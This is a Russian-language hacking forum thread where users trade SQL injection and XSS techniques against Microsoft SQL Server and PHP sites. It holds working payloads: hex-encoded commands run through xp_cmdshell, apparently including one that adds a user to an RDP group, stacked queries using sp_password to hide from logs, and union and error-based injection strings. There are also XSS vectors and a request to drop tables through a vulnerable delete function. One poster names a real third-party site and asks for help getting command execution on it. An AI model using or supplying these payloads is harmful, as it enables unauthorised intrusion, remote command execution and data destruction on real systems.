Народ, подскажите пожалуйста как правильно оформить функцию MS SQL для вывода результата(можно и процедуру). Пример: ------------------ create function mfunc() returns varchar as begin declare @sql varchar(8000) set @sql=0x73656c65637420404076657273696f6e <---Это запрос "select @@version" зашифрованный в HEX exec @sql return @sql END ------------------ Чето я и доков то нормальных не на гуглил... Надо чтоб вывело : ------------------ Microsoft SQL Server 2005 - 9.00.3042.00 (X64) Feb 10 2007 00:59:02 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) ------------------ В таком роде...
Если не работает хекс, то почему тогда срабатывает запрос вида : declare @net_grouprdp_add varchar(8000) select @net_grouprdp_add=0x6e6574206c........;exec master..xp_cmdshell @net_grouprdp_add; ---- С функцией я разобрался. Создал процедуру.
через eval() попробуй..... и вместо символов- ascii коды http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx
Проблема: -1'CREATE PROC test AS SELECT 1;--sp_password 'CREATE PROCEDURE' must be the first statement in a query batch. Че за фишка? Не въеду...
кажись уже давали эту ссылку: http://www.inattack.ru/article/519.html там насчет style 2 вектора есть, попробуй)
попробуй так: 1';CREATE PROC test AS SELECT 1;--sp_password @Mixon attr:expression() работает только в IE background-image: url(javascript:alert()) должно везде работать http://ha.ckers.org/xss.html
Там опечатка была )) Ну а в целом я так и сделал. И опять такую же ошибку выдает... Еще одная интересная фишка: Если выполнить -1+or+1=(select+user)-- то норм проходит. А если попробовать : -1+or+1=(SELECT+top+1+table_name+from+information_schema.tables)-- Выдает: Incorrect syntax near the keyword 'top'. Если так: -1+or+1=(SELECT+table_name+from+information_schema.tables)-- Incorrect syntax near the keyword 'FROM'. Странно. З. Ы. Microsoft SQL Server 2000
Обращаюсь к код-хакам: function del_news($news_id) { if ($news_id) { //echo("del_news<br>"); $r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id); $arr = mysql_fetch_array($r); if ($arr[0]){ del_img($news_id);} //echo("del_news_id=".$news_id."<br>"); mysql_query("DELETE FROM news WHERE news_id=".$news_id); } else echo("Функция del_news(news_id) - не указан news_id.<br>"); } function del_img($news_id) { if ($news_id) { //echo("del_img<br>"); $r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id); $arr = mysql_fetch_array($r); mysql_query("UPDATE news SET news_icon=NULL WHERE news_id=".$news_id); unlink("../".img_path.$arr[0]); } else echo("Функция del_img(news_id) - не указан news_id.<br>"); } Если поставить DEL запрос - он прокатит ? Если допустить,что $news_id принимает всё,что угодно. Есть в прайс листе такая кнопка Удалить),и вместо удаления новости я хочу удалить таблицу)).Покатит ? Как это будет выглядеть,я тоже не совсем понимаю =_=
http://kapstroytelecom.ru/?pid=17' Это же mssql? Скорее всего через sa настроено, помогите с инъекцией для выполнения cmd через exec master..xp_cmdshell('')...
Подскажите как победить это: 1' union select 1,version(),3 Inconvertible type mismatch between SourceColumn 'LeadDate' of Byte[] and the DataColumn 'LeadDate' of DateTime. Сконвертить надо? Каким образом? К примеру дулал так - 1' union select 1,cast(version()+as+datetime),3 В этом случае запрос проходит нормально, только вот результат не выводится...
